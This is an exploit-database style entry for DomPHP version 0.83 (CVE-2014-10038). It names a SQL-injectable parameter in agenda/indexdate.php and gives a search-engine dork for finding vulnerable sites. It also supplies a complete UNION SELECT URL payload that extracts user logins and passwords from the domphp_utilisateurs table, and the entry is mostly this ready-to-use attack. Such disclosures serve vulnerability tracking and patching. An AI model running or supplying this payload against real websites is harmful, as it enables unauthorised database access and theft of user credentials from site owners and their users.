DomPHP 0.83 - SQL Injection

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2014-01-15  
date_updated: 2014-01-15  
verified: 1  
codes: OSVDB-102180;CVE-2014-10038  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30872.txt  

-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability
-------------------------------------------------------------

= Author : Houssamix
= Script : DomPHP <= v0.83

= Download : http://www.domphp.com/download/

= BUG :  SQL Injection Vulnerability

= DORK : Site créé à l'aide du CMS DomPHP v0.83

= Exploit :
http://[target]/agenda/indexdate.php?ids=77 [SQL]

Exemple :

http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--